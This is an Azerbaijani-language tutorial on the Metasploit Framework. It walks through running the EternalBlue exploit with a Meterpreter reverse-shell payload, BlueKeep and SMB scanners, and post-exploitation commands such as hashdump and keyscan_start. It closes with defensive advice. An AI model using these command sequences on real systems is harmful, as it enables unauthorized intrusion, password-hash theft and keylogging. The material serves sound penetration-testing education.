Metasploit Framework: Texniki Təhlil və İstifadə Qaydaları
1. Giriş
Metasploit Framework, təhlükəsizlik mütəxəssisləri və penetrasiya testçiləri üçün hazırlanmış açıq mənbəli istismar (exploit) platformasıdır. Bu framework vasitəsilə zəiflikləri aşkar etmək, test etmək və sistemlərə daxil olmaq mümkündür. Metasploit, exploit-ləri, payload-ları, auxiliary modulları və post-exploitation alətlərini bir araya gətirən güclü bir təhlükəsizlik platformasıdır.
Bu məqalədə Metasploit-in qurulması, əsas terminlər və onun necə istifadə edildiyi haqqında danışacağıq.
2. Metasploit-in Qurulması
2.1. Linux və Kali Linux üzərində quraşdırma
Metasploit Kali Linux-da standart olaraq gəlir. Əgər sisteminizdə quraşdırılmayıbsa, aşağıdakı əmrləri istifadə edərək quraşdıra bilərsiniz:
sudo apt update && sudo apt install metasploit-framework -y
Metasploit-i işə salmaq üçün:
msfconsole
Əgər Metasploit-i manual quraşdırmaq istəyirsinizsə:
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
bundle install
./msfconsole
2.2. Windows üzərində quraşdırma
Metasploit-i Windows üzərində işlətmək üçün rəsmi installer-dən istifadə edə bilərsiniz:
- Rəsmi saytdan yükləyin: https://www.rapid7.com/products/metasploit/download/
- Quraşdırmanı tamamladıqdan sonra Metasploit Console-u açın.
Metasploit-in düzgün quraşdırıldığını yoxlamaq üçün aşağıdakı əmri icra edin:
msfconsole
Əgər hər hansı bir problem yoxdursa, Metasploit interfeysi açılacaq.
3. Metasploit-in Əsas Terminləri
Metasploit bir neçə əsas komponentdən ibarətdir:
- Exploit – Hədəf sistemdəki zəiflikdən istifadə edən kod.
- Payload – Exploit icra edildikdən sonra sistemdə işləyən kod (məsələn, shell açmaq üçün).
- Auxiliary – Exploit olmayan, lakin təhlükəsizlik skaneri və ya köməkçi alətlər.
- Post-Exploitation – Sistemdə tam nəzarəti ələ keçirdikdən sonra istifadə olunan alətlər.
- Encoders – Payload-ların antiviruslar tərəfindən aşkar edilməsinin qarşısını alan modullar.
4. Metasploit ilə Əsas Əmrlər və Modullar
4.1. Modulların Axtarışı və Seçilməsi
Metasploit-də exploit və digər modulları axtarmaq üçün aşağıdakı əmrdən istifadə edilir:
search ms17-010
Məsələn, EternalBlue exploit-ni seçmək üçün:
use exploit/windows/smb/ms17_010_eternalblue
Seçilmiş modulun detallarını görmək üçün:
info
4.2. Hədəfin və Payload-un Təyin Edilməsi
Hədəf IP adresini təyin etmək üçün:
set RHOSTS 192.168.1.10
Payload seçmək üçün:
set PAYLOAD windows/x64/meterpreter/reverse_tcp
Geri bağlantı (reverse shell) üçün yerli host və port təyin edirik:
set LHOST 192.168.1.5
set LPORT 4444
4.3. Exploit-i İşə Salmaq
Hazırlıq tamamlandıqdan sonra exploit-i çalışdırmaq üçün aşağıdakı əmrdən istifadə edilir:
exploit
Əgər hər şey uğurla gedərsə, Meterpreter shell açılacaq:
meterpreter >
Meterpreter komandaları:
sysinfo # Sistem haqqında məlumatı göstərir
getuid # İstifadəçi identifikasiyasını göstərir
shell # Hədəf sistemdə komanda xəttinə keçid edir
5. Auxiliary Modulların İstifadəsi
Metasploit yalnız exploit-lərdən ibarət deyil. Onun tərkibində çox sayda auxiliary modullar var. Məsələn, SMB zəifliklərini yoxlamaq üçün:
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.0/24
run
Hədəf sistemin zəif olub-olmadığını yoxlamaq üçün istifadə edilən başqa bir modul:
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS 192.168.1.10
run
6. Post-Exploitation və Təhlükəsizlik Testləri
Hədəf sistemə daxil olduqdan sonra aşağıdakı əmrlərlə onu analiz etmək mümkündür:
1. Faylları Yoxlamaq:
meterpreter > ls
2. Hədəf Kompüterin Şəbəkə Bağlantılarını Görmək:
meterpreter > netstat
3. Windows Hash-ləri Dump Etmək:
meterpreter > hashdump
4. Keylogger Başlatmaq:
meterpreter > keyscan_start
7. Metasploit-dən Müdafiə Yolları
Təşkilatlar və fərdi istifadəçilər Metasploit və digər exploit alətlərinə qarşı müdafiə tədbirləri görməlidir:
- Sistemlər və proqram təminatı daim yenilənməlidir.
- SMBv1 və köhnəlmiş protokollar deaktiv edilməlidir.
- RDP girişləri güclü şifrələrlə qorunmalıdır və yalnız ehtiyac olduqda aktiv edilməlidir.
- Firewallda TCP 445 və 3389 portları bağlanmalıdır.
- Intrusion Detection System (IDS) və Intrusion Prevention System (IPS) istifadə edilməlidir.
8. Nəticə
Metasploit Framework, təhlükəsizlik testçiləri və pentesterlər üçün güclü bir alətdir. Bu məqalədə onun əsas terminləri, istifadə qaydaları, exploit-lər, auxiliary modullar və post-exploitation texnikaları barədə danışdıq.
Metasploit-dən düzgün istifadə etmək, təhlükəsizlik boşluqlarını tapmaq və sistemləri qorumaq üçün mütəxəssislərə böyük üstünlük təmin edir. Lakin unutmaq olmaz ki, bu tip alətlər yalnız qanuni və etik məqsədlər üçün istifadə olunmalıdır.